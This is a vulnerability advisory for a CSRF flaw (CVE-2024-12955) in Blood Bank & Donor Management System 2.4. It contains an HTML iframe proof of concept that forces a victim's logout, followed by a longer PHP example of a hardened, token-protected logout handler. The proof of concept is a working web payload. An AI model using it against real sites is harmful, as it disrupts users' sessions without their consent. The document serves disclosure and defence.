## https://sploitus.com/exploit?id=PACKETSTORM:190568
# Exploit Title: Blood Bank & Donor Management System 2.4 - CSRF Improper Input Validation
# Google Dork: N/A
# Date: 2024-12-26
# Exploit Author: Kwangyun Keum
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system/
# Version: 2.4
# Tested on: Windows 10 / Kali Linux with Apache and MySQL
# CVE: CVE-2024-12955

## Description:
Blood Bank & Donor Management System v2.4 suffers from a Cross-Site Request
Forgery (CSRF) vulnerability due to the absence of CSRF tokens for critical
functionalities such as logout. An attacker can craft a malicious iframe
embedding the logout URL and trick a victim into clicking it. This results
in the victim being logged out without their consent.

## Steps to Reproduce:
1. Deploy Blood Bank & Donor Management System v2.4.
2. Log in as any user.
3. Use the following PoC to demonstrate the issue:

   ```html
   <html>
     <body>
       <iframe
         src="http://localhost/bbdms/logout.php"
         style="border:0px #FFFFFF none;"
         name="myLogoutFrame"
         scrolling="no"
         frameborder="1"
         marginheight="0px"
         marginwidth="0px"
         height="400px"
         width="600px"
         allowfullscreen>
       </iframe>
     </body>
   </html>
   ```

4. Save the above HTML code as logout_poc.html.
5. Open the file in a browser and click anywhere on the page to trigger the
   logout.
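The root cause described above, and the reason the PoC works, is that `logout.php` performs a state change on a plain GET request that carries the victim's session cookie. The following PHP is an added example, not the vendor's code, of what a hardened logout handler for a PHP session-based application looks like. File names, the cookie name `BBDMSSESSID`, and the redirect target `index.php` are assumptions; it requires PHP 7.3 or later for the array form of `session_set_cookie_params()` and `setcookie()`.

```php
<?php
// Added example (not the vendor's code): a CSRF-resistant logout.php for a
// PHP application that uses native sessions. Names below are hypothetical.
declare(strict_types=1);

// Constructed constant: the application's session cookie name (assumption).
const SESSION_COOKIE = 'BBDMSSESSID';

function startHardenedSession(): void
{
    // SameSite=Lax: the browser does not attach the session cookie to a
    // cross-site <iframe src=...> or <img src=...> load, so the framed
    // logout.php in the PoC arrives without a session and cannot end one.
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_name(SESSION_COOKIE);
    session_start();
}

// Per-session anti-CSRF token, generated once and reused on every
// state-changing form rendered to this user.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the submitted token equals the session token.
// hash_equals() compares in constant time.
function csrfTokenIsValid(?string $submitted): bool
{
    if (empty($_SESSION['csrf_token']) || !is_string($submitted)) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

function handleLogout(): void
{
    // 1. Refuse GET: an <iframe> or <img> can only issue GET requests.
    if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        http_response_code(405);
        header('Allow: POST');
        exit('Logout requires a POST request.');
    }
    // 2. Defence in depth: browsers that send Sec-Fetch-Site let the server
    //    reject cross-site requests before the token is even inspected.
    $site = $_SERVER['HTTP_SEC_FETCH_SITE'] ?? 'same-origin';
    if (!in_array($site, ['same-origin', 'same-site', 'none'], true)) {
        http_response_code(403);
        exit('Cross-site request rejected.');
    }
    // 3. Require the per-session token in the POST body.
    if (!csrfTokenIsValid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token.');
    }
    // 4. Destroy the session server-side and expire the cookie client-side.
    $_SESSION = [];
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();
        setcookie(session_name(), '', [
            'expires'  => time() - 3600,
            'path'     => $p['path'],
            'domain'   => $p['domain'],
            'secure'   => $p['secure'],
            'httponly' => $p['httponly'],
            'samesite' => $p['samesite'],
        ]);
    }
    session_destroy();
    header('Location: index.php'); // assumed landing page
    exit;
}

// Logout form for the authenticated layout. The token is emitted only into
// pages served to the logged-in user, so another origin cannot read it.
function logoutFormHtml(): string
{
    $token = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="logout.php">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<button type="submit">Logout</button></form>';
}

// logout.php entry point.
startHardenedSession();
handleLogout();
```

With these changes the advisory's PoC fails three times over: the iframe issues a GET, which is refused; the `SameSite=Lax` cookie is not attached to the cross-site frame, so there is no session to end; and even a cross-site POST would lack the token that only the application's own pages embed. The same `csrfToken()` / `csrfTokenIsValid()` pair should be applied to every other state-changing form in the application, since the advisory notes that logout is only one example of the missing check.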